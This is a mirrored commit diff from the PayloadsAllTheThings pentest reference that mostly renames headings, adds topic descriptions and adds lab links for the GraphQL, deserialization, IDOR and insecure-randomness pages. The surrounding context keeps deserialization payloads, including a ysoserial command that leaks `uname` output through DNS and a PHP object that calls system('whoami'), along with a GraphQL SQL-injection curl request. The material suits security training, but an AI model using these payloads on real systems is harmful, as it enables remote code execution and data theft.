mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-04 02:20:17 +00:00
Normalize page header for GraphQL, Deserialization, SCM
This commit is contained in:
parent
2deb20a6f1
commit
2304101657
21 changed files with 262 additions and 129 deletions
|
@ -6,17 +6,17 @@
|
|||
## Summary
|
||||
|
||||
* [Tools](#tools)
|
||||
* [Enumerate](#enumerate)
|
||||
* [Methodology](#methodology)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
## Tools
|
||||
|
||||
* [FSecureLABS/GWTMap](https://github.com/FSecureLABS/GWTMap)
|
||||
* [GDSSecurity/GWT-Penetration-Testing-Toolset](https://github.com/GDSSecurity/GWT-Penetration-Testing-Toolset)
|
||||
* [FSecureLABS/GWTMap](https://github.com/FSecureLABS/GWTMap) - GWTMap is a tool to help map the attack surface of Google Web Toolkit (GWT) based applications.
|
||||
* [GDSSecurity/GWT-Penetration-Testing-Toolset](https://github.com/GDSSecurity/GWT-Penetration-Testing-Toolset) - A set of tools made to assist in penetration testing GWT applications.
|
||||
|
||||
|
||||
## Enumerate
|
||||
## Methodology
|
||||
|
||||
* Enumerate the methods of a remote application via it's bootstrap file and create a local backup of the code (selects permutation at random):
|
||||
```ps1
|
||||
|
|
|
@ -13,7 +13,7 @@
|
|||
- [Enumerate Database Schema via Suggestions](#enumerate-database-schema-via-suggestions)
|
||||
- [Enumerate the types' definition](#enumerate-the-types-definition)
|
||||
- [List path to reach a type](#list-path-to-reach-a-type)
|
||||
- [Exploit](#exploit)
|
||||
- [Methodology](#methodology)
|
||||
- [Extract data](#extract-data)
|
||||
- [Extract data using edges/nodes](#extract-data-using-edgesnodes)
|
||||
- [Extract data using projections](#extract-data-using-projections)
|
||||
|
@ -24,6 +24,7 @@
|
|||
- [Injections](#injections)
|
||||
- [NOSQL injection](#nosql-injection)
|
||||
- [SQL injection](#sql-injection)
|
||||
- [Labs](#labs)
|
||||
- [References](#references)
|
||||
|
||||
|
||||
|
@ -243,7 +244,7 @@ Found 27 ways to reach the "Skill" node from the "Query" node:
|
|||
```
|
||||
|
||||
|
||||
## Exploit
|
||||
## Methodology
|
||||
|
||||
### Extract data
|
||||
|
||||
|
@ -384,6 +385,19 @@ curl -X POST http://localhost:8080/graphql\?embedded_submission_form_uuid\=1%27%
|
|||
```
|
||||
|
||||
|
||||
## Labs
|
||||
|
||||
* [PortSwigger - Accessing private GraphQL posts](https://portswigger.net/web-security/graphql/lab-graphql-reading-private-posts)
|
||||
* [PortSwigger - Accidental exposure of private GraphQL fields](https://portswigger.net/web-security/graphql/lab-graphql-accidental-field-exposure)
|
||||
* [PortSwigger - Finding a hidden GraphQL endpoint](https://portswigger.net/web-security/graphql/lab-graphql-find-the-endpoint)
|
||||
* [PortSwigger - Bypassing GraphQL brute force protections](https://portswigger.net/web-security/graphql/lab-graphql-brute-force-protection-bypass)
|
||||
* [PortSwigger - Performing CSRF exploits over GraphQL](https://portswigger.net/web-security/graphql/lab-graphql-csrf-via-graphql-api)
|
||||
* [Root Me - GraphQL - Introspection](https://www.root-me.org/fr/Challenges/Web-Serveur/GraphQL-Introspection)
|
||||
* [Root Me - GraphQL - Injection](https://www.root-me.org/fr/Challenges/Web-Serveur/GraphQL-Injection)
|
||||
* [Root Me - GraphQL - Backend injection](https://www.root-me.org/fr/Challenges/Web-Serveur/GraphQL-Backend-injection)
|
||||
* [Root Me - GraphQL - Mutation](https://www.root-me.org/fr/Challenges/Web-Serveur/GraphQL-Mutation)
|
||||
|
||||
|
||||
## References
|
||||
|
||||
- [Building a free open source GraphQL wordlist for penetration testing - Nohé Hinniger-Foray - August 17, 2023](https://escape.tech/blog/graphql-security-wordlist/)
|
||||
|
|
|
@ -1,8 +1,19 @@
|
|||
# Headless Browser
|
||||
|
||||
A headless browser is a web browser without a graphical user interface. It works just like a regular browser, such as Chrome or Firefox, by interpreting HTML, CSS, and JavaScript, but it does so in the background, without displaying any visuals.
|
||||
> A headless browser is a web browser without a graphical user interface. It works just like a regular browser, such as Chrome or Firefox, by interpreting HTML, CSS, and JavaScript, but it does so in the background, without displaying any visuals.
|
||||
|
||||
Headless browsers are primarily used for automated tasks, such as web scraping, testing, and running scripts. They are particularly useful in situations where a full-fledged browser is not needed, or where resources (like memory or CPU) are limited.
|
||||
> Headless browsers are primarily used for automated tasks, such as web scraping, testing, and running scripts. They are particularly useful in situations where a full-fledged browser is not needed, or where resources (like memory or CPU) are limited.
|
||||
|
||||
|
||||
## Summary
|
||||
|
||||
* [Headless Commands](#headless-commands)
|
||||
* [Local File Read](#local-file-read)
|
||||
* [Debugging Port ](#debugging-port)
|
||||
* [Network](#network)
|
||||
* [Port Scanning](#port-scanning)
|
||||
* [DNS Rebinding](#dns-rebinding)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
## Headless Commands
|
||||
|
|
|
@ -2,12 +2,13 @@
|
|||
|
||||
> Web applications often have hidden or undocumented parameters that are not exposed in the user interface. Fuzzing can help discover these parameters, which might be vulnerable to various attacks.
|
||||
|
||||
|
||||
## Summary
|
||||
|
||||
* [Tools](#tools)
|
||||
* [Exploit](#exploit)
|
||||
* [Bruteforce parameters](#bruteforce-parameters)
|
||||
* [Old parameters](#old-parameters)
|
||||
* [Methodology](#methodology)
|
||||
* [Bruteforce Parameters](#bruteforce-parameters)
|
||||
* [Old Parameters](#old-parameters)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
|
@ -20,9 +21,9 @@
|
|||
* [devanshbatham/ParamSpider](https://github.com/devanshbatham/ParamSpider) - Mining URLs from dark corners of Web Archives for bug hunting/fuzzing/further probing
|
||||
|
||||
|
||||
## Exploit
|
||||
## Methodology
|
||||
|
||||
### Bruteforce parameters
|
||||
### Bruteforce Parameters
|
||||
|
||||
* Use wordlists of common parameters and send them, look for unexpected behavior from the backend.
|
||||
```ps1
|
||||
|
@ -39,7 +40,7 @@ Wordlist examples:
|
|||
- [samlists/sam-cc-parameters-mixedcase-all.txt](https://github.com/the-xentropy/samlists/blob/main/sam-cc-parameters-mixedcase-all.txt)
|
||||
|
||||
|
||||
### Old parameters
|
||||
### Old Parameters
|
||||
|
||||
Explore all the URL from your targets to find old parameters.
|
||||
|
||||
|
|
|
@ -1,4 +1,7 @@
|
|||
# .NET Serialization
|
||||
# .NET Deserialization
|
||||
|
||||
> .NET serialization is the process of converting an object’s state into a format that can be easily stored or transmitted, such as XML, JSON, or binary. This serialized data can then be saved to a file, sent over a network, or stored in a database. Later, it can be deserialized to reconstruct the original object with its data intact. Serialization is widely used in .NET for tasks like caching, data transfer between applications, and session state management.
|
||||
|
||||
|
||||
## Summary
|
||||
|
||||
|
|
|
@ -1,5 +1,8 @@
|
|||
# Java Deserialization
|
||||
|
||||
> Java serialization is the process of converting a Java object’s state into a byte stream, which can be stored or transmitted and later reconstructed (deserialized) back into the original object. Serialization in Java is primarily done using the `Serializable` interface, which marks a class as serializable, allowing it to be saved to files, sent over a network, or transferred between JVMs.
|
||||
|
||||
|
||||
## Summary
|
||||
|
||||
* [Detection](#detection)
|
||||
|
@ -19,6 +22,7 @@
|
|||
- Content-type = "application/x-java-serialized-object"
|
||||
- `"H4sIAAAAAAAAAJ"` in gzip(base64)
|
||||
|
||||
|
||||
## Tools
|
||||
|
||||
### Ysoserial
|
||||
|
@ -33,44 +37,44 @@ java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | b
|
|||
```
|
||||
|
||||
**List of payloads included in ysoserial:**
|
||||
```ps1
|
||||
Payload Authors Dependencies
|
||||
------- ------- ------------
|
||||
AspectJWeaver @Jang aspectjweaver:1.9.2, commons-collections:3.2.2
|
||||
BeanShell1 @pwntester, @cschneider4711 bsh:2.0b5
|
||||
C3P0 @mbechler c3p0:0.9.5.2, mchange-commons-java:0.2.11
|
||||
Click1 @artsploit click-nodeps:2.3.0, javax.servlet-api:3.1.0
|
||||
Clojure @JackOfMostTrades clojure:1.8.0
|
||||
CommonsBeanutils1 @frohoff commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
|
||||
CommonsCollections1 @frohoff commons-collections:3.1
|
||||
CommonsCollections2 @frohoff commons-collections4:4.0
|
||||
CommonsCollections3 @frohoff commons-collections:3.1
|
||||
CommonsCollections4 @frohoff commons-collections4:4.0
|
||||
CommonsCollections5 @matthias_kaiser, @jasinner commons-collections:3.1
|
||||
CommonsCollections6 @matthias_kaiser commons-collections:3.1
|
||||
CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1
|
||||
FileUpload1 @mbechler commons-fileupload:1.3.1, commons-io:2.4
|
||||
Groovy1 @frohoff groovy:2.3.9
|
||||
Hibernate1 @mbechler
|
||||
Hibernate2 @mbechler
|
||||
JBossInterceptors1 @matthias_kaiser javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
|
||||
JRMPClient @mbechler
|
||||
JRMPListener @mbechler
|
||||
JSON1 @mbechler json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
|
||||
JavassistWeld1 @matthias_kaiser javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
|
||||
Jdk7u21 @frohoff
|
||||
Jython1 @pwntester, @cschneider4711 jython-standalone:2.5.2
|
||||
MozillaRhino1 @matthias_kaiser js:1.7R2
|
||||
MozillaRhino2 @_tint0 js:1.7R2
|
||||
Myfaces1 @mbechler
|
||||
Myfaces2 @mbechler
|
||||
ROME @mbechler rome:1.0
|
||||
Spring1 @frohoff spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
|
||||
Spring2 @mbechler spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
|
||||
URLDNS @gebl
|
||||
Vaadin1 @kai_ullrich vaadin-server:7.7.14, vaadin-shared:7.7.14
|
||||
Wicket1 @jacob-baines wicket-util:6.23.0, slf4j-api:1.6.4
|
||||
```
|
||||
|
||||
| Payload | Authors | Dependencies |
|
||||
| ------------------- | -------------------------------------- | --- |
|
||||
| AspectJWeaver | @Jang | aspectjweaver:1.9.2, commons-collections:3.2.2 |
|
||||
| BeanShell1 | @pwntester, @cschneider4711 | bsh:2.0b5 |
|
||||
| C3P0 | @mbechler | c3p0:0.9.5.2, mchange-commons-java:0.2.11 |
|
||||
| Click1 | @artsploit | click-nodeps:2.3.0, javax.servlet-api:3.1.0 |
|
||||
| Clojure | @JackOfMostTrades | clojure:1.8.0 |
|
||||
| CommonsBeanutils1 | @frohoff | commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2 |
|
||||
| CommonsCollections1 | @frohoff | commons-collections:3.1 |
|
||||
| CommonsCollections2 | @frohoff | commons-collections4:4.0 |
|
||||
| CommonsCollections3 | @frohoff | commons-collections:3.1 |
|
||||
| CommonsCollections4 | @frohoff | commons-collections4:4.0 |
|
||||
| CommonsCollections5 | @matthias_kaiser, @jasinner | commons-collections:3.1 |
|
||||
| CommonsCollections6 | @matthias_kaiser | commons-collections:3.1 |
|
||||
| CommonsCollections7 | @scristalli, @hanyrax, @EdoardoVignati | commons-collections:3.1 |
|
||||
| FileUpload1 | @mbechler | commons-fileupload:1.3.1, commons-io:2.4|
|
||||
| Groovy1 | @frohoff | groovy:2.3.9 |
|
||||
| Hibernate1 | @mbechler | |
|
||||
| Hibernate2 | @mbechler | |
|
||||
| JBossInterceptors1 | @matthias_kaiser | javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 |
|
||||
| JRMPClient | @mbechler | |
|
||||
| JRMPListener | @mbechler | |
|
||||
| JSON1 | @mbechler | json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1 |
|
||||
| JavassistWeld1 | @matthias_kaiser | javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 |
|
||||
| Jdk7u21 | @frohoff | |
|
||||
| Jython1 | @pwntester, @cschneider4711 | jython-standalone:2.5.2 |
|
||||
| MozillaRhino1 | @matthias_kaiser | js:1.7R2 |
|
||||
| MozillaRhino2 | @_tint0 | js:1.7R2 |
|
||||
| Myfaces1 | @mbechler | |
|
||||
| Myfaces2 | @mbechler | |
|
||||
| ROME | @mbechler | rome:1.0 |
|
||||
| Spring1 | @frohoff | spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE |
|
||||
| Spring2 | @mbechler | spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2 |
|
||||
| URLDNS | @gebl | |
|
||||
| Vaadin1 | @kai_ullrich | vaadin-server:7.7.14, vaadin-shared:7.7.14 |
|
||||
| Wicket1 | @jacob-baines | wicket-util:6.23.0, slf4j-api:1.6.4 |
|
||||
|
||||
|
||||
### Burp extensions
|
||||
|
||||
|
@ -108,23 +112,23 @@ Wicket1 @jacob-baines wicket-util:6.23.0, s
|
|||
// arguments - Gadget specific arguments
|
||||
```
|
||||
|
||||
Payload generators for the following marshallers are included:<br />
|
||||
Payload generators for the following marshallers are included:
|
||||
|
||||
| Marshaller | Gadget Impact
|
||||
| ------------------------------- | ----------------------------------------------
|
||||
| BlazeDSAMF(0|3|X) | JDK only escalation to Java serialization<br/>various third party libraries RCEs
|
||||
| Hessian|Burlap | various third party RCEs
|
||||
| Castor | dependency library RCE
|
||||
| Jackson | **possible JDK only RCE**, various third party RCEs
|
||||
| Java | yet another third party RCE
|
||||
| JsonIO | **JDK only RCE**
|
||||
| JYAML | **JDK only RCE**
|
||||
| Kryo | third party RCEs
|
||||
| KryoAltStrategy | **JDK only RCE**
|
||||
| Red5AMF(0|3) | **JDK only RCE**
|
||||
| SnakeYAML | **JDK only RCEs**
|
||||
| XStream | **JDK only RCEs**
|
||||
| YAMLBeans | third party RCE
|
||||
| Marshaller | Gadget Impact |
|
||||
| ------------------------------- | ---------------------------------------------- |
|
||||
| BlazeDSAMF(0|3|X) | JDK only escalation to Java serialization various third party libraries RCEs |
|
||||
| Hessian|Burlap | various third party RCEs |
|
||||
| Castor | dependency library RCE |
|
||||
| Jackson | **possible JDK only RCE**, various third party RCEs |
|
||||
| Java | yet another third party RCE |
|
||||
| JsonIO | **JDK only RCE** |
|
||||
| JYAML | **JDK only RCE** |
|
||||
| Kryo | third party RCEs |
|
||||
| KryoAltStrategy | **JDK only RCE** |
|
||||
| Red5AMF(0|3) | **JDK only RCE** |
|
||||
| SnakeYAML | **JDK only RCEs** |
|
||||
| XStream | **JDK only RCEs** |
|
||||
| YAMLBeans | third party RCE |
|
||||
|
||||
|
||||
## References
|
||||
|
|
|
@ -1,14 +1,17 @@
|
|||
# Node Deserialization
|
||||
|
||||
> Node.js deserialization refers to the process of reconstructing JavaScript objects from a serialized format, such as JSON, BSON, or other formats that represent structured data. In Node.js applications, serialization and deserialization are commonly used for data storage, caching, and inter-process communication.
|
||||
|
||||
|
||||
## Summary
|
||||
|
||||
* [Exploit](#exploit)
|
||||
* [Methodology](#methodology)
|
||||
* [node-serialize](#node-serialize)
|
||||
* [funcster](#funcster)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
## Exploit
|
||||
## Methodology
|
||||
|
||||
* In Node source code, look for:
|
||||
* `node-serialize`
|
||||
|
@ -47,6 +50,6 @@
|
|||
|
||||
## References
|
||||
|
||||
- [CVE-2017-5941 - NATIONAL VULNERABILITY DATABASE - February 9, 2017](https://nvd.nist.gov/vuln/detail/CVE-2017-5941)
|
||||
- [CVE-2017-5941 - National Vulnerability Database - February 9, 2017](https://nvd.nist.gov/vuln/detail/CVE-2017-5941)
|
||||
- [Exploiting Node.js deserialization bug for Remote Code Execution (CVE-2017-5941) - Ajin Abraham - October 31, 2018](https://www.exploit-db.com/docs/english/41289-exploiting-node.js-deserialization-bug-for-remote-code-execution.pdf)
|
||||
- [NodeJS Deserialization - gonczor - January 8, 2020](https://blacksheephacks.pl/nodejs-deserialization/)
|
|
@ -1,20 +1,20 @@
|
|||
# PHP Deserialization
|
||||
|
||||
PHP Object Injection is an application level vulnerability that could allow an attacker to perform different kinds of malicious attacks, such as Code Injection, SQL Injection, Path Traversal and Application Denial of Service, depending on the context. The vulnerability occurs when user-supplied input is not properly sanitized before being passed to the unserialize() PHP function. Since PHP allows object serialization, attackers could pass ad-hoc serialized strings to a vulnerable unserialize() call, resulting in an arbitrary PHP object(s) injection into the application scope.
|
||||
> PHP Object Injection is an application level vulnerability that could allow an attacker to perform different kinds of malicious attacks, such as Code Injection, SQL Injection, Path Traversal and Application Denial of Service, depending on the context. The vulnerability occurs when user-supplied input is not properly sanitized before being passed to the unserialize() PHP function. Since PHP allows object serialization, attackers could pass ad-hoc serialized strings to a vulnerable unserialize() call, resulting in an arbitrary PHP object(s) injection into the application scope.
|
||||
|
||||
|
||||
## Summary
|
||||
|
||||
* [General concept](#general-concept)
|
||||
* [Authentication bypass](#authentication-bypass)
|
||||
* [General Concept](#general-concept)
|
||||
* [Authentication Bypass](#authentication-bypass)
|
||||
* [Object Injection](#object-injection)
|
||||
* [Finding and using gadgets](#finding-and-using-gadgets)
|
||||
* [Finding and Using Gadgets](#finding-and-using-gadgets)
|
||||
* [Phar Deserialization](#phar-deserialization)
|
||||
* [Real world examples](#real-world-examples)
|
||||
* [Real World Examples](#real-world-examples)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
## General concept
|
||||
## General Concept
|
||||
|
||||
The following magic methods will help you for a PHP Object injection
|
||||
|
||||
|
@ -62,9 +62,10 @@ a:2:{i:0;s:4:"XVWA";i:1;s:33:"Xtreme Vulnerable Web Application";}
|
|||
string(68) "O:18:"PHPObjectInjection":1:{s:6:"inject";s:17:"system('whoami');";}"
|
||||
```
|
||||
|
||||
## Authentication bypass
|
||||
|
||||
### Type juggling
|
||||
## Authentication Bypass
|
||||
|
||||
### Type Juggling
|
||||
|
||||
Vulnerable code:
|
||||
|
||||
|
@ -123,7 +124,7 @@ a:2:{s:10:"admin_hash";N;s:4:"hmac";R:2;}
|
|||
```
|
||||
|
||||
|
||||
## Finding and using gadgets
|
||||
## Finding and Using Gadgets
|
||||
|
||||
Also called `"PHP POP Chains"`, they can be used to gain RCE on the system.
|
||||
|
||||
|
@ -236,7 +237,7 @@ A valid PHAR includes four elements:
|
|||
```
|
||||
|
||||
|
||||
## Real world examples
|
||||
## Real World Examples
|
||||
|
||||
* [Vanilla Forums ImportController index file_exists Unserialize Remote Code Execution Vulnerability - Steven Seeley](https://hackerone.com/reports/410237)
|
||||
* [Vanilla Forums Xenforo password splitHash Unserialize Remote Code Execution Vulnerability - Steven Seeley](https://hackerone.com/reports/410212)
|
||||
|
|
|
@ -1,5 +1,7 @@
|
|||
# Python Deserialization
|
||||
|
||||
> Python deserialization is the process of reconstructing Python objects from serialized data, commonly done using formats like JSON, pickle, or YAML. The pickle module is a frequently used tool for this in Python, as it can serialize and deserialize complex Python objects, including custom classes.
|
||||
|
||||
## Summary
|
||||
|
||||
* [Detection](#detection)
|
||||
|
|
|
@ -2,6 +2,7 @@
|
|||
|
||||
> Serialization is the process of turning some object into a data format that can be restored later. People often serialize objects in order to save them to storage, or to send as part of communications. Deserialization is the reverse of that process -- taking data structured from some format, and rebuilding it into an object - OWASP
|
||||
|
||||
|
||||
## Summary
|
||||
|
||||
* [Deserialization Identifier](#deserialization-identifier)
|
||||
|
@ -42,8 +43,17 @@ POP gadgets characteristics:
|
|||
|
||||
## Labs
|
||||
|
||||
* [Portswigger - Insecure Deserialization](https://portswigger.net/web-security/all-labs#insecure-deserialization)
|
||||
* [NickstaDB/DeserLab - Java deserialization exploitation lab](https://github.com/NickstaDB/DeserLab)
|
||||
* [PortSwigger - Modifying serialized objects](https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-modifying-serialized-objects)
|
||||
* [PortSwigger - Modifying serialized data types](https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-modifying-serialized-data-types)
|
||||
* [PortSwigger - Using application functionality to exploit insecure deserialization](https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-using-application-functionality-to-exploit-insecure-deserialization)
|
||||
* [PortSwigger - Arbitrary object injection in PHP](https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-arbitrary-object-injection-in-php)
|
||||
* [PortSwigger - Exploiting Java deserialization with Apache Commons](https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-exploiting-java-deserialization-with-apache-commons)
|
||||
* [PortSwigger - Exploiting PHP deserialization with a pre-built gadget chain](https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-exploiting-php-deserialization-with-a-pre-built-gadget-chain)
|
||||
* [PortSwigger - Exploiting Ruby deserialization using a documented gadget chain](https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-exploiting-ruby-deserialization-using-a-documented-gadget-chain)
|
||||
* [PortSwigger - Developing a custom gadget chain for Java deserialization](https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-developing-a-custom-gadget-chain-for-java-deserialization)
|
||||
* [PortSwigger - Developing a custom gadget chain for PHP deserialization](https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-developing-a-custom-gadget-chain-for-php-deserialization)
|
||||
* [PortSwigger - Using PHAR deserialization to deploy a custom gadget chain](https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-using-phar-deserialization-to-deploy-a-custom-gadget-chain)
|
||||
* [NickstaDB - DeserLab](https://github.com/NickstaDB/DeserLab)
|
||||
|
||||
|
||||
## References
|
||||
|
|
|
@ -1,5 +1,8 @@
|
|||
# Ruby Deserialization
|
||||
|
||||
> Ruby deserialization is the process of converting serialized data back into Ruby objects, often using formats like YAML, Marshal, or JSON. Ruby's Marshal module, for instance, is commonly used for this, as it can serialize and deserialize complex Ruby objects.
|
||||
|
||||
|
||||
## Summary
|
||||
|
||||
* [Marshal.load](#marshalload)
|
||||
|
@ -18,12 +21,14 @@ for i in {0..5}; do docker run -it ruby:2.${i} ruby -e 'Marshal.load(["0408553a1
|
|||
## Yaml.load
|
||||
|
||||
Vulnerable code
|
||||
|
||||
```ruby
|
||||
require "yaml"
|
||||
YAML.load(File.read("p.yml"))
|
||||
```
|
||||
|
||||
Universal gadget for ruby <= 2.7.2:
|
||||
|
||||
```ruby
|
||||
--- !ruby/object:Gem::Requirement
|
||||
requirements:
|
||||
|
|
|
@ -1,15 +1,19 @@
|
|||
# YAML Deserialization
|
||||
|
||||
> YAML deserialization is the process of converting YAML-formatted data back into objects in programming languages like Python, Ruby, or Java. YAML (YAML Ain't Markup Language) is popular for configuration files and data serialization because it is human-readable and supports complex data structures.
|
||||
|
||||
|
||||
## Summary
|
||||
|
||||
* [Tools](#tools)
|
||||
* [Exploit](#exploit)
|
||||
* [Methodology](#methodology)
|
||||
* [PyYAML](#pyyaml)
|
||||
* [ruamel.yaml](#ruamelyaml)
|
||||
* [Ruby](#ruby)
|
||||
* [SnakeYAML](#snakeyaml)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
## Tools
|
||||
|
||||
* [j0lt-github/python-deserialization-attack-payload-generator](https://github.com/j0lt-github/python-deserialization-attack-payload-generator)
|
||||
|
@ -17,7 +21,7 @@
|
|||
* [mbechler/marshalsec](https://github.com/mbechler/marshalsec) - Java Unmarshaller Security - Turning your data into code execution
|
||||
|
||||
|
||||
## Exploit
|
||||
## Methodology
|
||||
|
||||
### PyYAML
|
||||
|
||||
|
|
|
@ -1,19 +1,19 @@
|
|||
# Insecure Direct Object References
|
||||
|
||||
> Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources in the system directly, for example database records or files. - OWASP
|
||||
> Insecure Direct Object References (IDOR) is a security vulnerability that occurs when an application allows users to directly access or modify objects (such as files, database records, or URLs) based on user-supplied input, without sufficient access controls. This means that if a user changes a parameter value (like an ID) in a URL or API request, they might be able to access or manipulate data that they aren’t authorized to see or modify.
|
||||
|
||||
|
||||
## Summary
|
||||
|
||||
* [Tools](#tools)
|
||||
* [Labs](#labs)
|
||||
* [Exploit](#exploit)
|
||||
* [Methodology](#methodology)
|
||||
* [Numeric Value Parameter](#numeric-value-parameter)
|
||||
* [Common Identifiers Parameter](#common-identifiers-parameter)
|
||||
* [Weak Pseudo Random Number Generator](#weak-pseudo-random-number-generator)
|
||||
* [Hashed Parameter](#hashed-parameter)
|
||||
* [Wildcard Parameter](#wildcard-parameter)
|
||||
* [IDOR Tips](#idor-tips)
|
||||
* [Labs](#labs)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
|
@ -24,12 +24,7 @@
|
|||
- [PortSwigger/BApp Store > Autorize](https://portswigger.net/bappstore/f9bbac8c4acf4aefa4d7dc92a991af2f)
|
||||
|
||||
|
||||
## Labs
|
||||
|
||||
- [PortSwigger - Insecure Direct Object References](https://portswigger.net/web-security/access-control/lab-insecure-direct-object-references)
|
||||
|
||||
|
||||
## Exploit
|
||||
## Methodology
|
||||
|
||||
IDOR stands for Insecure Direct Object Reference. It's a type of security vulnerability that arises when an application provides direct access to objects based on user-supplied input. As a result, attackers can bypass authorization and access resources in the system directly, potentially leading to unauthorized information disclosure, modification, or deletion.
|
||||
|
||||
|
@ -130,6 +125,11 @@ Send a wildcard (`*`, `%`, `.`, `_`) instead of an ID, some backend might respon
|
|||
* Use Parameter Pollution: `user_id=hacker_id&user_id=victim_id`
|
||||
|
||||
|
||||
## Labs
|
||||
|
||||
- [PortSwigger - Insecure Direct Object References](https://portswigger.net/web-security/access-control/lab-insecure-direct-object-references)
|
||||
|
||||
|
||||
## References
|
||||
|
||||
- [From Christmas present in the blockchain to massive bug bounty - Jesse Lakerveld - March 21, 2018](http://web.archive.org/web/20180401130129/https://www.vicompany.nl/magazine/from-christmas-present-in-the-blockchain-to-massive-bug-bounty)
|
||||
|
|
|
@ -1,5 +1,10 @@
|
|||
# Insecure Management Interface
|
||||
|
||||
> Insecure Management Interface refers to vulnerabilities in administrative interfaces used for managing servers, applications, databases, or network devices. These interfaces often control sensitive settings and can have powerful access to system configurations, making them prime targets for attackers.
|
||||
|
||||
> Insecure Management Interfaces may lack proper security measures, such as strong authentication, encryption, or IP restrictions, allowing unauthorized users to potentially gain control over critical systems. Common issues include using default credentials, unencrypted communications, or exposing the interface to the public internet.
|
||||
|
||||
|
||||
## Summary
|
||||
|
||||
* [Springboot-Actuator](#springboot-actuator)
|
||||
|
@ -27,12 +32,14 @@ Note: Sensitive endpoints will require a username/password when they are accesse
|
|||
|
||||
Since Springboot 2.X only `/health` and `/info` are enabled by default.
|
||||
|
||||
|
||||
### Remote Code Execution via `/env`
|
||||
|
||||
Spring is able to load external configurations in the YAML format.
|
||||
The YAML config is parsed with the SnakeYAML library, which is susceptible to deserialization attacks.
|
||||
In other words, an attacker can gain remote code execution by loading a malicious config file.
|
||||
|
||||
|
||||
#### Steps
|
||||
|
||||
1. Generate a payload of SnakeYAML deserialization gadget.
|
||||
|
|
|
@ -1,16 +1,55 @@
|
|||
# Insecure Randomness
|
||||
|
||||
> Insecure randomness refers to the weaknesses associated with random number generation in computing, particularly when such randomness is used for security-critical purposes. Vulnerabilities in random number generators (RNGs) can lead to predictable outputs that can be exploited by attackers, resulting in potential data breaches or unauthorized access.
|
||||
|
||||
|
||||
## Summary
|
||||
|
||||
* [Methodology](#methodology)
|
||||
* [Time-Based Seeds](#time-based-seeds)
|
||||
* [GUID / UUID](#guid--uuid)
|
||||
* [GUID Versions](#guid-versions)
|
||||
* [Mongo ObjectId](#mongo-objectid)
|
||||
* [Uniqid](#uniqid)
|
||||
* [mt_rand](#mt_rand)
|
||||
* [Other](#other)
|
||||
* [Custom Algorithms](#custom-algorithms)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
## Methodology
|
||||
|
||||
Insecure randomness arises when the source of randomness or the method of generating random values is not sufficiently unpredictable. This can lead to predictable outputs, which can be exploited by attackers. Below, we examine common methods that are prone to insecure randomness, including time-based seeds, GUIDs, UUIDs, MongoDB ObjectIds, and the `uniqid()` function.
|
||||
|
||||
|
||||
## Time-Based Seeds
|
||||
|
||||
Many random number generators (RNGs) use the current system time (e.g., milliseconds since epoch) as a seed. This approach can be insecure because the seed value can be easily predicted, especially in automated or scripted environments.
|
||||
|
||||
```py
|
||||
import random
|
||||
import time
|
||||
|
||||
seed = int(time.time())
|
||||
random.seed(seed)
|
||||
print(random.randint(1, 100))
|
||||
```
|
||||
|
||||
The RNG is seeded with the current time, making it predictable for anyone who knows or can estimate the seed value.
|
||||
By knowing the exact time, an attacker can regenerate the correct random value, here is an example for the date `2024-11-10 13:37`.
|
||||
|
||||
```python
|
||||
import random
|
||||
import time
|
||||
|
||||
# Seed based on the provided timestamp
|
||||
seed = int(time.mktime(time.strptime('2024-11-10 13:37', '%Y-%m-%d %H:%M')))
|
||||
random.seed(seed)
|
||||
|
||||
# Generate the random number
|
||||
print(random.randint(1, 100))
|
||||
```
|
||||
|
||||
|
||||
## GUID / UUID
|
||||
|
||||
